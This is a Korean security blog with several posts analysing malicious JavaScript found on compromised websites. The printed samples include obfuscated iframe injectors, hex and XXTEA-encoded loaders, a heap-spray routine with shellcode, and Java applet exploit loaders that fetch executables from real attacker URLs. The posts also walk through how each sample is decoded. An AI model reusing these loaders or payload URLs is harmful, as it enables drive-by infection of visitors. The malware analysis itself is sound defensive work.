posted by Kwan's 2013. 2. 14. 20:24

우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다.

우선은 배치된 코드는 다음과 같습니다.

try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}}
if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}
asgq=new Array
(1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,110,64,104,93,102,95,105,112,107,59,115,
79,93,95,71,91,104,97,32,32,92,106,96,113,32,35,86,44,85,34,117,8,5,1,2,99,97,110,89,102,95,109,
36,33,52,7,4,5,117,25,95,103,111,93,25,117,8,5,1,2,94,106,95,109,102,95,105,112,38,112,108,100,
112,93,33,28,55,101,94,107,91,104,97,24,108,108,94,57,31,97,110,111,108,50,40,41,96,106,100,90,
108,98,97,101,94,104,111,48,38,105,108,106,43,101,98,97,99,112,39,93,108,106,108,104,98,104,98,
91,97,103,109,111,93,100,101,99,105,99,38,105,98,107,35,24,112,99,95,112,96,54,33,44,44,31,25,98,
96,101,95,97,110,56,35,41,41,33,27,111,108,114,102,96,57,31,112,99,95,112,96,51,43,43,44,104,113
,53,99,97,97,96,98,111,54,41,41,42,107,116,51,105,105,110,101,108,98,105,105,54,89,91,109,106,104,
109,109,95,54,104,93,95,110,53,41,41,41,42,107,116,51,109,105,107,54,40,52,33,57,56,39,98,96,109,
93,101,94,56,29,37,51,6,3,4,121,5,2,3,97,113,102,92,110,100,107,102,25,99,97,110,89,102,95,109,36,
33,116,[생략]96,35,33,52,96,41,111,93,109,59,111,112,106,98,92,112,112,93,33,33,110,110,91,32,38,
34,100,108,109,106,53,43,39,94,104,103,93,106,96,95,104,97,102,109,46,41,108,106,104,41,104,101,95,
97,110,42,96,106,104,106,107,101,102,96,89,100,106,107,109,91,103,104,97,103,97,41,108,96,105,33,36
,55,94,39,109,111,117,100,94,40,103,97,94,109,55,34,41,41,41,42,107,116,31,52,96,41,111,108,114,102,
96,42,108,104,106,56,35,40,32,53,97,42,107,109,115,103,97,38,105,105,110,101,108,98,105,105,57,31,
90,92,110,107,100,110,110,96,35,51,95,40,110,112,113,101,95,41,104,93,95,110,56,35,40,32,53,97,42,
107,109,115,103,97,38,109,105,107,57,31,41,33,54,98,38,108,95,111,61,108,109,108,100,94,109,109,
95,35,35,111,98,94,111,100,31,37,33,44,44,31,34,53,97,42,107,94,110,60,112,108,107,99,93,113,108
,94,34,34,100,93,98,97,99,112,31,37,33,44,44,31,34,53,8,5,1,2,94,106,95,109,102,95,105,112,38,96,
95,111,65,100,94,103,96,106,108,108,60,116,80,89,96,72,92,105,93,33,33,93,107,92,114,33,36,87,40,
86,40,92,108,104,94,104,95,63,96,98,102,95,36,94,34,53,8,5,1,118);
s="";for(i=0;i-637!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-8));}
z=s;e(z);}


asgq=new Array 로 정의 되어 있는 코드는 정상적인 아스키코드가 아닙니다.
일반 String.fromCharCode를 통해서 출력을 해보면.. 다음과 같은 문자가 나옵니다!

ca ]i^qe^ho*_^n@h]f_ipk;sO]_G[ha \j`q #V,U"u canYf_m$!4 u _go] u ^j_mf_ip&pldp]! 7e^k[ha ll^9 anol2()`jdZlbae^ho0&ilj+ebacp']ljlhbhb[agmo]decic&ibk# pc_p`6!,, b`e_an8#))! olrf`9 pc_p`3++,hq5caa`bo6))*kt3iinelbii6Y[mjhmm_6h]_n5)))*kt3mik6(4!98'b`m]e^8 %3 y aqf\ndkf canYf_m$!t o[m ^ 7 `g\ohafm(^n]Zn`Ad^g`jl!!dbjZg`#!4`)o]m;opjb\pp]!!nn[ &"dlmj5+'^hg]j`_hafm.)ljh)he_an*`jhjkef`Ydjkm[ghaga)l`i!$7^'moud^(ga^m7")))*kt 4`)olrf`*lhj8#( 5a*kmsga&iinelbii9 Z\nkdnn`#3_(npqe_)h]_n8#( 5a*kmsga&mik9 )!6b&l_o=lmld^mm_##ob^od %!,, "5a*k^n


이와 같이 정상적인 아스키코드로 나오지 않습니다.

그렇다면 다시 코드를 살펴보면 다음과 같습니다.


s="";for(i=0;i-637!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-8));

즉... i=0; i-637!=0;i++ ->  i-637 값이 0이 아닐때까지 루핑을 한다는 뜻입니다.
결론적으로   i-637!이 0에 도달하면 이 함수는 끝이나게 됩니다.
i++와 같이 계속 1씩 증가함으로 637이 되는순간 함수는 끝나게 됩니다.

다음오로 {if(020==0x10)s+ 은 -> 020 == 10진수일경우 s가 증가 하게 됩니다.

그렇다면 어떤한 방식으로 다시 배치를 하는걸 까요?? 바로 String.fromCharCode(1*asgq[i]-(i%5-8)); 입니다.
asgq=new Array 에서 처음이 1이니 1*1-(i->0%5-8) 이런식으로 계산을 하게 됩니다.


이를 바탕으로 연산과정을 거치면 ! 연결된 링크를 볼수 있습니다 : )



if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://enlargement4.pro/might/dropping_installing.php' width='10' height='10' style='width:100px;height:100px;position:absolute;left:-100px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://enlargement4.pro/might/dropping_installing.php');f.style.left='-100px';f.style.top='0';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}


바이러스 토탈 링크 :
https://www.virustotal.com/ko/file/becc92d0fa7e355e231c3b9da797a5e8fa9b39ef79ab6da48e98b5e20e1d685a/analysis/1360839068/

우선 처음으로 작성을 해보았는데.. 부족한 접이 있더라도 이해해 주세요~
틀린점이 있다면 지적을 해주셔도 좋습니다 : )

마지막으로 도움을 주신 바이올렛님께 감사를 드립니다 : )


댓글을 달아 주세요

posted by Kwan's 2013. 1. 24. 20:10

발견지 : http://integridesign.com/David/index.php?target=contact

* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다!


위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다!


</body>

</HTML>

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e627

57974612e636f2e62652f666f72756d2e7068703f74703d3637356561666563343331623166373222207

7696474683d223122206865696768743d223122206672616d65626f726465723d223

[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65

726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d363735656166656334333162316

63732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223

e3c[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6c6f63

756d7265736f75726365732e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623

1663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230

223e[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


잠깐 확인을 해보자면 이 코드는 간단하다.

 "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !

알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.

HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 !


Decode 를 해보면 연결되는 사이트는 다음과 같다 !


document.write('<iframe src="http://vnbuyta.co.be/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


해당 사이트들은 현재 접속이 되고 있지 않다 !


하지만 스크립트를 보면서 조금만 문구를 변경하여도 못잡는것이 마음이 안타까웠다.....

문구를 var t -> var x 로 바꾸면 진단 못하는게 너무 허무하기도 하고 안타깝기도 했다.

역시 최선은 사용자가 접속하기 전에 미리 차단을 해버리는것이 제일 사용자를 지키는 일인거 같다!


댓글을 달아 주세요

posted by Kwan's 2012. 12. 23. 16:51

http://kids.woorisoop.org/kids/css/kids.js

http://www.marieclairekorea.com/user/pop/pop_photot.html

   →http://www.rootmand.com/hndex/index.html (JSXX 0.44 VIP)

   →http://www.rootmand.com/hndex/swfobject.js

   →http://www.rootmand.com/hndex/jpg.js


 var XzAWBt8=navigator.userAgent.toLowerCase();

 var kuAyQq8="1"+"1"+"1";

 if(document.cookie.indexOf("pCRvCM5=")==-1 && XzAWBt8.indexOf("linux")<=-1 && XzAWBt8.indexOf("bot")==-1 && XzAWBt8.indexOf("spider")==-1)

 {

   var rPTjUMk8=deconcept.SWFObjectUtil.getPlayerVersion();

   var expires=new Date();

   expires.setTime(expires.getTime()+24*60*60*1000);

   kuAyQq8="0";

   document.cookie="pCRvCM5=Yes;path=/;expires="+expires.toGMTString();

   iJFTc5="1";

   delete iJFTc5;

   try

   {

     iJFTc5+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";

   }

   catch(e)

   {

     var pDQnnGf7="1";

     czsI0 = eval

   }

   nzERs1=unescape;

   lfNx6="[생략]0C";

 fjKju8="function XDMYi7(){jdEeR1=Math.PI;byfSvL0=Math.tan;wUTlxW5=parseInt;PUJFl7='length';voMP6='test';WVAnR7='replace';HipSKp8=wUTlxW5(~((jdEeR1&jdEeR1)|(~jdEeR1&jdEeR1)&(jdEeR1&~jdEeR1)|(~jdEeR1&~jdEeR1)));vzln1=wUTlxW5(((HipSKp8&HipSKp8)|(~HipSKp8&HipSKp8)&(HipSKp8&~HipSKp8)|(~HipSKp8&~HipSKp8))&1);/*Encrypt By www.sunshinem.com's JSXX 0.44 VIP*/qdDV3=vzln1<<vzln1;new function(){CbNxM1=czsI0('1Qe4dG*]6zY^k8vb]#&,m8$[x_GD3a]Nj5dsn7[F[8cu[S34Rlc]4r;idpDt='[WVAnR7](/[^v@0el9a]/g,''));[생략]('ere');}}";WEsQg5 = czsI0(czsI0);WEsQg5(fjKju8);

 }


byfSvL0=CbNxM1;rsIlD3=CqsL5(20100418);while(window.closed){}document.write("<br>");

var gondady=document.createElement('body');

document.body.appendChild(gondady);

var gondadx=deployJava.getJREs()+"";

var arrx=gondadx.split(",");

gondadx=parseInt(arrx[0].replace(/\.|\_/g,''));

for(i=1;i<arrx.length;i++)

{

tmp=parseInt(arrx[i].replace(/\.|\_/g,''));

if (gondadx<tmp) gondadx=tmp;

}

if ((gondadx<=17007 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))

{

var gondad = document.createElement('applet');

gondad.width="1";

gondad.height="1";

if((gondadx<=16027 && gondadx>=16000) || (gondadx>=15000 && gondadx<=15031))

{

gondad.archive="QWhYkvj4.jpg";

gondad.code="GondadGondadExp.class";

gondad.setAttribute("dota","http://www.sunshinem.com/kor/wow.exe");

document.body.appendChild(gondad);

}

else if ((gondadx<=17002 && gondadx>=17000) || (gondadx<=16030 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))

{

gondad.archive="paHvWdd2.jpg";

gondad.code="GondadExx.Ohno.class";

gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");

gondad.setAttribute("bn","woyouyizhixiaomaolv");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

else if ((gondadx<=17003 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15032 && gondadx>=15000))

{

gondad.archive="IFoESa4.jpg";

gondad.code="gond1723.Gondattack.class";

gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");

gondad.setAttribute("bn","woyouyizhixiaomaolv");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

else if (gondadx<=17006 && gondadx>=17000)

{

var HXjpkN2 = window.navigator.userAgent.toLowerCase();

if (HXjpkN2.indexOf('msie 6') > -1)

{

document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.sunshinem.com/kor/wow.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'qccs2.jpg'></OBJECT>");

}

else

{

gondad.archive="qccs2.jpg";

gondad.code="cve2012xxxx.Gondvv.class";

gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");

gondad.setAttribute("bn","woyouyizhixiaomaolv");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

}

else if (gondadx<=17007 && gondadx>=17000)

{

var HXjpkN2 = window.navigator.userAgent.toLowerCase();

if (HXjpkN2.indexOf('msie 6') > -1)

{

document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.sunshinem.com/kor/wow.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gond20125076.Gondqq.class'><param name=archive value= 'dkVlU7.jpg'></OBJECT>");

}

else

{

gondad.archive="dkVlU7.jpg";

gondad.code="gond20125076.Gondqq.class";

gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");

gondad.setAttribute("bn","woyouyizhixiaomaolv");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

}

}

else {

/*

if(rPTjUMk8['major']==11 && rPTjUMk8['minor']<=3 && rPTjUMk8['rev']<=300 && rPTjUMk8['gondad']<= 270){

document.writeln("<img src=jmnI1.swf><\/img>");

setTimeout("document.writeln(\"<embed width=100 height=0 src=jmnI1.swf><\\/embed>\");",2000);

}

else{

*/

var HXjpkN2 = window.navigator.userAgent.toLowerCase();

if ((HXjpkN2.indexOf('msie 6') > -1)||(HXjpkN2.indexOf('msie 7') > -1)) {

document.writeln("<iframe src=rpdTtS8.html><\/iframe>");

}

else if((HXjpkN2.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 5.1') > -1) && (navigator.browserLanguage.indexOf('ko') > -1)){

document.writeln("<iframe src=QWhYkvj4.html><\/iframe>");

}

//}

}


스크립트를 보면서 궁금했던 점이 바로 Delete 의 역활이었다.

Delete의 역활을 중간에 임의의 코드나 실행 방해를 할줄 알았는데 그게 아니었다!


http://happybruce.tistory.com/973 블로그에 나온


Delete 의 역활을 적어본다!


1. var 로 선언된 변수는 삭제 할 수 없습니다. 

2. 사용자가 생성한 객체 및 객체 속성은 삭제 할 수 있으나 내부 객체 , 내부 객체의 속성 들은  

    삭제 할 수 없습니다. 


이와 같이 Delete는 아무것도 아닌 역활을 하는것이었다!


하지만 스크립트 상의 임의의 키값이나 내에 코드값을 임의의 수로 변경시킨다면


ÚÒÆÇøœGÙøÐ#ÇéqÌêÚ>×á’g»ªÒ¶×²xÍÑZzÁÑR֗Sù…R‡ôŽŸâÎ ¾ÂÓÁ¶œÛ¡¶ÒÃ׿ÐÎÖÜÚÒˆðˆ€ÎÿҜм›¯Ø!Ðò(̶›ïyŒ


이와 같이 알수없는 문자로 나오니 조심하자!


마지막으로 궁금점에 대해 답해주신 JJoon 님께 감사하다는 말을 덧붙이고 싶다!


항상 JSXX 0.44 VIP 보면서 키값을 연산하여서 했었는데 이번에 새로 알게된것도 있어서 너무 좋다!

골칫덩러리를 해결한거 같아서!

나도 도움을 받는게 아니라 도움을 주는날도 언젠간 오겠지??


댓글을 달아 주세요

  1. ITmonster 2012.12.24 11:40 신고  Addr  Edit/Del  Reply

    저도 디코딩방법좀 굽신

    • Kwan's 2012.12.25 16:52 신고  Addr  Edit/Del

      조금만 기다리세요~
      추후에 다시 글을 올리겠습니다~
      저도 맨날 햇갈려서요 되었다 안되었다하네요~

posted by Kwan's 2012. 12. 8. 16:13

발견지 : http://www.leesmusic.co.kr [리스뮤직]

            →http://www.leesmusic.co.kr/./lees/index.php 

              (<iframe src=http://seoul-kla.com/admin/data/webedit/1.htm width=0 height=0></iframe>)

               →http://www.7iaa.com/index.html (서버죽음)

               →http://seoul-kla.com/admin/data/webedit/1.htm

                 http://www.baikec.cn/down/ko.exe(복호화 최종파일)

                → http://seoul-kla.com/admin/data/webedit/svchsot.exe(스크립트 내 연결 파일)


<http://seoul-kla.com/admin/data/webedit/1.htm>


if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace

("about:blank");

~>user agent의 정보얻은후 msie 7 ->location.replace about:blank


function sleep(milliseconds)

{

var start=new Date().getTime();


for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}


function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));

~> dadong -> %u replace


var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape("%u0a0a%u0a0a");

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}

}


function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}


var a1="dadong";

spray

(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadon

g5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981

dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122

dadong4921[생략]dadong2121dadong2121

dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121

dadong2121dadong2

121dadong2121dadong0021");


~> dadong -> %u replace-> http://www.baikec.cn/down/ko.exe 연결!


sleep(3000);


nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf('MSIE')!=-1)

{

version=parseFloat(navigator.appVersion.split('MSIE')[1])

~> MSIE 버전 확인


}

if(version==7)

{

w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));

wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));

if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image 

SRC=http://&#114;&#2570;&#114;.book.com 

~> MSIE 7 버전 확인 -> 시스템 정보 확인 (windows 2003, windows xp) -> xml 취약점 실행!


src="http://seoul-kla.com/admin/data/webedit/svchsot.exe"]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C 

DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C 

DATAFORMATAS=HTML></SPAN>');

var i=1;while(i<=10)

{

window.status=" ";i++}

}


요즘에 잠잠했던 xml 취약점을 이용하여 악성코드를 유포하는 방식을 오랜만에 보았다!

ie 버전과 시스템 버전을 확인하여 유포할수도 있고 쉘코드에서도 유포할 수 있는 방식이 사용된걸 볼 수있었다.

현재는 많이 알려져서 패치가 되었지만 그래도 아직까지 사용하는거 보니 패치가 안되어있는 사람도 많은거 같다!


댓글을 달아 주세요

posted by Kwan's 2012. 11. 3. 16:29

발견지 : http://www.icross.co.kr [교차로]

            →http://festival.cocobau.com/adm_site/e_show/e_th_abd.js

               →http://173.245.86.205/pic/img.js

               →http://173.245.86.205/pic/img.html (Yszz 1.5 vip)

               → http://173.245.86.152/img/jpg.css (최종파일)

               → http://173.245.86.205/pic/swfobject.js

               → http://173.245.86.205/pic/jpg.js

               →http://173.245.86.205/pic/css.html


http://festival.cocobau.com/adm_site/e_show/e_th_abd.js


-----------------------------------------------------------------------------------------------


if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%37%33[생략]3E%3C%2F%73%63%72%69%70%74%3E"));}


http://173.245.86.205/pic/img.js


-----------------------------------------------------------------------------------------------


var Zcy6MU=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("mOV6Pgrf")==-1 && Zcy6MU.indexOf("Safari")==-1)

{

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="mOV6Pgrf=Yes;path=/;expires="+expires.toGMTString();

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/css.html\"></iframe>");

}



http://173.245.86.205/pic/img.htm

var K4Er = "%";

var MDIxo=K4Er+"78"+K4Er+"6F";

var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

var HHYWv=K4Er+"31"+K4Er+"59"+"%53";

var CvXWz=K4Er+"7A"+"%7A"+"%31";

var JZyjl=K4Er+"31"+"%6F"+"%78";

var ERb7H="%6F"+"%78";

var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="

SxoCgWBKhwTnhbKKvyhglFbDI8vGLakQIWymnWKeCk

[생략]

V4rVoO9tDGGcT+gxv+YEN7BYdH+oBpSPPprdnJdlAqGPs4bg=

",HUx2Ydz=K4Er+"64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",sac5pxhFS=

"%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

var kxin1s = "%53"+"%74"+"%72";

var B83pNx = kxin1s+"%69"+"%6e"+"%67";

var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

var SnDN8 = "%73"+"%74"+"%72";

var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,[생략]-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,

38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);

HUx2Ydz=AVgHbu2f(HUx2Ydz);

function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 0.11 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

sac5pxhFS=AVgHbu2f(sac5pxhFS);

KWZAooZ=Cn6T4bG0znIi;

KWZAooZ=tzWmUni(kaixin(ZjykejU6(KWZAooZ), ubo8KLEZHIPX2));

window[HUx2Ydz][sac5pxhFS] (KWZAooZ);


var RWkTTC8=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && 

[생략]

{

var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();

var kaixiny=document.createElement('body');

document.body.appendChild(kaixiny);

var kaixinm=deployJava.getJREs()+"";

kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));

if (kaixinm<=17006)

{

var kaixin=document.createElement('applet');

kaixin.width="1";

kaixin.height="1";

if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031)) 

{

kaixin.archive="0jDBDaQC.jpg";

kaixin.code="GondadGondadExp.class";

kaixin.setAttribute("dota","http://173.245.86.152/img/jpg.css");

document.body.appendChild(kaixin);

}

else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

{

kaixin.archive="XyAPlXp.jpg";

kaixin.code="gond1723.Gondattack.class";

kaixin.setAttribute("xiaomaolv","http://173.245.86.152/img/jpg.css");

kaixin.setAttribute("bn","woyouyizhixiaomaolv");

kaixin.setAttribute("si","conglaiyebuqi");

kaixin.setAttribute("bs","748");

document.body.appendChild(kaixin);

}

else

{

var ques3 = window.navigator.userAgent.toLowerCase();

if (ques3.indexOf("msie 6") > -1....write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://173.245.86.152/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'F8xzd.jpg'></OBJECT>");

else 

    {

        document.write("<br>");

        var kaixinq = document.createElement("body");

        document.body.appendChild(kaixinq);

        var kaixiny = document.createElement("applet");

        kaixiny.width = "256";

        kaixiny.height = "256";

        kaixiny.archive = "F8xzd.jpg";

        kaixiny.code = "cve2012xxxx.Gondvv.class";

        kaixiny.setAttribute("xiaomaolv", "http://173.245.86.152/img/jpg.css");

        kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

        kaixiny.setAttribute("si", "conglaiyebuqi");

        kaixiny.setAttribute("bs", "748");

        document.body.appendChild(kaixiny);

    }

 }

}

else {


       var pcss=navigator.userAgent.toLowerCase();

       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

       if ((UaYcKzD2.indexOf('msie 8.0') > -1))

       {


        document.writeln("<iframe src=thotMy.html><\/iframe>");


       }


       else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

        {


document.writeln("<iframe src=1ryxA.html><\/iframe>");


        }


}

}


유심히 지켜볼 사이트이다..... 구인 구직 구하러 들어갔다가.. 악성코드에 감염되지 않게 조심해야겠다!


댓글을 달아 주세요

posted by Kwan's 2012. 11. 2. 19:45

